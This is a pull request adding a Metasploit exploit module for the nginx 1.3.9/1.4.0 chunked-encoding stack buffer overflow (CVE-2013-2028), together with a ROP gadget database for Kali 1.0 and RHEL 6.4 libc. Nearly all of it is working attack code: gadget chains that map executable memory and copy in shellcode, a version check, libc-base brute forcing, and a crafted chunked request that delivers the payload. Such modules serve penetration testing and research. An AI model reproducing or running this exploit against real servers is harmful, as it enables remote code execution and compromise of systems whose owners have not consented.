### PR TITLE
Exploit module for nginx chunked stack buffer overflow.

### DIFF
--- a/data/ropdb/nginx.xml
+++ b/data/ropdb/nginx.xml
@@ -1,0 +1,143 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+    <rop>
+        <compatibility>
+            <target>Kali Linux 1.0</target>
+        </compatibility>
+
+        <!--
+        dpkg -l libc-* ii  libc-bin 2.13-38 i386 Embedded GNU C Library: Binaries
+        b7533000-b768f000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
+        b7692000-b7693000 rw-p 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
+        -->
+
+        <gadgets base="0">
+            <gadget offset="0x00001aa6">pop edx</gadget>
+            <gadget value ="0x080c429c">mmap64.plt</gadget>
+            <gadget offset="0x00078b14">xor eax, eax</gadget>
+            <gadget offset="0x0011d795">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x0002a137">mov [eax], ecx</gadget>
+            <gadget offset="0x00003689">xchg ebp, eax</gadget>
+            <gadget offset="0x00078b14">xor eax, eax</gadget>
+            <gadget offset="0x0011d795">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x0006efb0">mov eax [edx] ; mov [ecx] eax ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00125ec9">call eax ; pop ebx ; pop ebp</gadget>
+            <gadget value ="0x00000000">addr</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget offset="0x000eb9f7">add esp 0x10 ; pop ebx ; pop ebp ;; (Also flags: PROT_READ | PROT_WRITE | PROT_EXEC)</gadget>
+            <gadget value ="0x00000022">MAP_PRIVATE | MAP_ANON</gadget>
+            <gadget value ="0xffffffff">filedes</gadget>
+            <gadget value ="0x00000000">off_t</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00103dbe">push esp ; pop ebx ; pop esi ; pop edi ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000ab68d">xchg ebx eax ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x0007fa9c">add eax 0x8 ;;</gadget>
+            <gadget offset="0x000b0edc">push eax ; xor eax eax ; pop esi ; pop ebp ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000ab68d">xchg ebx eax ;;</gadget>
+            <gadget offset="0x000c9325">xchg edi eax ;;</gadget>
+            <gadget offset="0x000e2c02">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000200">payload size (in dwords)</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x0007a35c">rep movsd ; xchg edi eax ; mov esi edx ;; </gadget>
+            <gadget offset="0x0002a6eb">pop ecx, pop edx</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x00121fd8">sub eax, ecx</gadget>
+            <gadget offset="0x000e2abb">call eax ; pop ebx ; pop ebp ;;</gadget>
+	   </gadgets>
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>Red Hat Enterprise Linux 6.4</target>
+        </compatibility>
+
+        <!--
+        rpm -qa | grep libc- glibc-2.12-1.107.el6.i686
+        001a1000-00335000 r-xp 00000000 ca:41 14763      /lib/i686/nosegneg/libc-2.12.so
+        00337000-00338000 rw-p 00196000 ca:41 14763      /lib/i686/nosegneg/libc-2.12.so
+        -->
+
+        <gadgets base="0">
+            <gadget offset="0x00001aa6">pop edx</gadget>
+            <gadget value ="0x080b42d4">mmap64</gadget>
+            <gadget offset="0x0007a414">xor eax, eax</gadget>
+            <gadget offset="0x00139aa0">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x0002a4e7">mov [eax], ecx</gadget>
+            <gadget offset="0x00003671">xchg ebp, eax</gadget>
+            <gadget offset="0x0007a414">xor eax, eax</gadget>
+            <gadget offset="0x00139aa0">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x0006fc30">mov eax [edx] ; mov [ecx] eax ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00145519">call eax ; pop ebx ; pop ebp</gadget>
+            <gadget value ="0x00000000">addr</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget offset="0x000a0677">add esp 0x20 ; pop ebx ; pop ebp ;; (Also flags: PROT_READ | PROT_WRITE | PROT_EXEC)</gadget>
+            <gadget value ="0x00000022">MAP_PRIVATE | MAP_ANON</gadget>
+            <gadget value ="0xffffffff">filedes</gadget>
+            <gadget value ="0x00000000">off_t</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000bc833">push esp ; pop ebx ; pop esi ; pop edi ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00168d09">xchg ebx eax ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b1c">add eax 0x8 ;;</gadget>
+            <gadget offset="0x000b00cc">push eax ; xor eax eax ; pop esi ; pop ebp ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00168d09">xchg ebx eax ;;</gadget>
+            <gadget offset="0x0016d283">xchg edi eax ;;</gadget>
+            <gadget offset="0x0002aacb">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000200">payload size (in dwords)</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x0007bd3c">rep movsd ; xchg edi eax ; mov esi edx ;; </gadget>
+            <gadget offset="0x0002aacb">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x00141218">sub eax, ecx</gadget>
+            <gadget offset="0x000f59fb">call eax ; pop ebx ; pop ebp ;;</gadget>
+        </gadgets>
+    </rop>
+</db>

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -1,0 +1,125 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+	include Exploit::Remote::HttpClient
+	include Msf::Exploit::RopDb
+	include Msf::Exploit::Brute
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Nginx HTTP Server 1.3.9/1.4.0 Chuncked Encoding Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack buffer overflow in 1.3.9 and 1.4.0 of nginx.
+			},
+			'Author'         => 'hal',
+			'DisclosureDate' => 'May 07 2013',
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2013-2028'],
+					['OSVDB', '93037'],
+					['URL', 'http://nginx.org/en/security_advisories.html'],
+					['URL', 'http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html']
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisabeNops' => false,
+					'Space'    => 0x800,
+					'BadChars' => "\x0d\x0a\x20",
+				},
+			'Targets'        =>
+				[
+					[
+						'Kali Linux 1.0',
+						{
+							'Arch' => ARCH_X86,
+							'Ropname' => 'Kali Linux 1.0',
+							'Platform' => 'linux',
+							'Offset' => 5030,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libc_base' => 0xb74c0000},
+									'Stop'  => { 'libc_base' => 0xb75d0000},
+									'Step'  => 0x1000
+								}
+						},
+					],
+					[
+						'Red Hat Enterprise Linux 6.4',
+						{
+							'Arch' => ARCH_X86,
+							'Ropname' => 'Red Hat Enterprise Linux 6.4',
+							'Platform' => 'linux',
+							'Offset' => 5048,
+							'Bruteforce' =>
+								{
+									'Start' => { 'libc_base' => 0x00110000},
+									'Stop'  => { 'libc_base' => 0x0044f000},
+									'Step'  => 0x1000
+								}
+						}
+					],
+				],
+
+			'DefaultTarget' => 0))
+	end
+
+	def check
+		@peer = "#{rhost}:#{rport}"
+
+		begin
+			res = send_request_cgi({
+				'uri' => '/'
+			})
+
+			if res and res.code == 200 and res.headers['Server'] =~ /nginx\/(1\.3\.9|1\.4\.0)/
+				return Exploit::CheckCode::Appears
+			elsif res and res.code == 200 and res.headers['Server'] =~ /nginx/
+				return Exploit::CheckCode::Detected
+			end
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("#{@peer} - Connection failed")
+		end
+
+		return Exploit::CheckCode::Unknown
+
+	end
+
+	def brute_exploit(target_addrs)
+		connect
+
+		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
+
+		data = 	"A" * target['Offset']
+		data <<	generate_rop_payload('nginx', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
+		data << payload.encoded
+
+		2.times do
+			begin
+				send_request_raw({
+					'uri' => 	'/',
+					'headers' =>  {
+						'Transfer-Encoding' => "Chunked",
+					},
+					'data' => data
+				}, 2)
+			rescue Errno::ECONNRESET => e
+				# Ignore
+			end
+		end
+
+
+		handler
+	end
+
+end
+


### PR DESCRIPTION
This is an exploit module for the chunked encoding stack buffer overflow vulnerability in nginx 1.3.9 and 1.4.0.  It also includes a ropdb xml file for the exploit with targets for Kali 1.0 (my dev environment) and RHEL 6.4 using the installed libc for both targets.
